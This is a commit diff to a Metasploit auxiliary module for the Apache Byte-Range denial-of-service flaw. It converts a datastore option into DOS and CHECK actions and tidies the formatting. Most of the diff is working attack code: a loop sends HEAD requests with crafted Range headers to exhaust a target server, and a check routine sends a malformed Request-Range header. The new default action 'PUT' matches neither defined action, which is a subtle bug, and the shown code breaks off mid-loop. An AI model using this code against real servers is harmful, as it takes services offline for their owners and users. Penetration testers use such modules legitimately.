Uses "ACTIONS" keys instead of datastore options
It's better to use ACTIONS instead of datastore in this case. Also, did some cleanup.unstable
parent
1714fa21b1
commit
7e28a4ddb0
|
@ -1,7 +1,3 @@
|
||||||
##
|
|
||||||
# $Id$
|
|
||||||
##
|
|
||||||
|
|
||||||
##
|
##
|
||||||
# This file is part of the Metasploit Framework and may be subject to
|
# This file is part of the Metasploit Framework and may be subject to
|
||||||
# redistribution and commercial restrictions. Please see the Metasploit
|
# redistribution and commercial restrictions. Please see the Metasploit
|
||||||
|
@ -35,7 +31,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
|
'Markus Neis <markus.neis[at]gmail.com>' # check for vulnerability
|
||||||
],
|
],
|
||||||
'License' => MSF_LICENSE,
|
'License' => MSF_LICENSE,
|
||||||
'Version' => '$Revision$',
|
'Actions' =>
|
||||||
|
[
|
||||||
|
['DOS'],
|
||||||
|
['CHECK']
|
||||||
|
],
|
||||||
|
'DefaultAction' => 'PUT',
|
||||||
'References' =>
|
'References' =>
|
||||||
[
|
[
|
||||||
[ 'BID', '49303'],
|
[ 'BID', '49303'],
|
||||||
|
@ -43,43 +44,44 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
[ 'EDB', '17696'],
|
[ 'EDB', '17696'],
|
||||||
[ 'OSVDB', '74721' ],
|
[ 'OSVDB', '74721' ],
|
||||||
],
|
],
|
||||||
'DisclosureDate' => 'Aug 19 2011',
|
'DisclosureDate' => 'Aug 19 2011'
|
||||||
))
|
))
|
||||||
|
|
||||||
register_options(
|
register_options(
|
||||||
[
|
[
|
||||||
Opt::RPORT(80),
|
Opt::RPORT(80),
|
||||||
OptString.new('URI', [ true, "The request URI", '/']),
|
OptString.new('URI', [ true, "The request URI", '/']),
|
||||||
OptInt.new('RLIMIT', [ true, "Number of requests to send",50]),
|
OptInt.new('RLIMIT', [ true, "Number of requests to send",50])
|
||||||
OptEnum.new('ACTION', [true, "DOS or CHECK", "DOS",["DOS","CHECK"]])
|
|
||||||
], self.class)
|
], self.class)
|
||||||
end
|
end
|
||||||
|
|
||||||
def run_host(ip)
|
def run_host(ip)
|
||||||
|
|
||||||
case datastore['action']
|
case action.name
|
||||||
|
when 'DOS'
|
||||||
|
conduct_dos()
|
||||||
|
|
||||||
when 'DOS'
|
when 'CHECK'
|
||||||
conduct_dos()
|
check_for_dos()
|
||||||
|
|
||||||
when 'CHECK'
|
|
||||||
check_for_dos()
|
|
||||||
end
|
end
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
def check_for_dos()
|
def check_for_dos()
|
||||||
path = datastore['URI']
|
path = datastore['URI']
|
||||||
begin
|
begin
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => path,
|
'uri' => path,
|
||||||
'method' => 'HEAD',
|
'method' => 'HEAD',
|
||||||
'headers' => { "HOST" => "Localhost", "Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"} })
|
'headers' => {
|
||||||
|
"HOST" => "Localhost",
|
||||||
if (res and res.code == 206)
|
"Request-Range" => "bytes=5-0,1-1,2-2,3-3,4-4,5-5,6-6,7-7,8-8,9-9,10-10"
|
||||||
print_status("Response was #{res.code}")
|
}
|
||||||
print_status("Found Byte-Range Header DOS at #{path}")
|
})
|
||||||
|
|
||||||
|
if (res and res.code == 206)
|
||||||
|
print_status("Response was #{res.code}")
|
||||||
|
print_status("Found Byte-Range Header DOS at #{path}")
|
||||||
|
|
||||||
report_note(
|
report_note(
|
||||||
:host => rhost,
|
:host => rhost,
|
||||||
|
@ -87,16 +89,13 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
:data => "Apache Byte-Range DOS at #{path}"
|
:data => "Apache Byte-Range DOS at #{path}"
|
||||||
)
|
)
|
||||||
|
|
||||||
else
|
else
|
||||||
print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
|
print_status("#{rhost} doesn't seem to be vulnerable at #{path}")
|
||||||
|
end
|
||||||
end
|
|
||||||
|
|
||||||
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
rescue ::Rex::ConnectionRefused, ::Rex::HostUnreachable, ::Rex::ConnectionTimeout
|
||||||
rescue ::Timeout::Error, ::Errno::EPIPE
|
rescue ::Timeout::Error, ::Errno::EPIPE
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
end
|
end
|
||||||
|
|
||||||
|
|
||||||
|
@ -111,10 +110,12 @@ class Metasploit3 < Msf::Auxiliary
|
||||||
begin
|
begin
|
||||||
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
|
print_status("Sending DoS packet #{x} to #{rhost}:#{rport}")
|
||||||
res = send_request_cgi({
|
res = send_request_cgi({
|
||||||
'uri' => uri,
|
'uri' => uri,
|
||||||
'method' => 'HEAD',
|
'method' => 'HEAD',
|
||||||
'headers' => { "HOST" => rhost,
|
'headers' => {
|
||||||
"Range" => "bytes=0-#{ranges}"}},1)
|
"HOST" => rhost,
|
||||||
|
"Range" => "bytes=0-#{ranges}"}},1)
|
||||||
|
|
||||||
rescue ::Rex::ConnectionRefused
|
rescue ::Rex::ConnectionRefused
|
||||||
print_status("Unable to connect to #{rhost}:#{rport}.")
|
print_status("Unable to connect to #{rhost}:#{rport}.")
|
||||||
rescue ::Errno::ECONNRESET
|
rescue ::Errno::ECONNRESET
|
||||||
|
|
Loading…
Reference in New Issue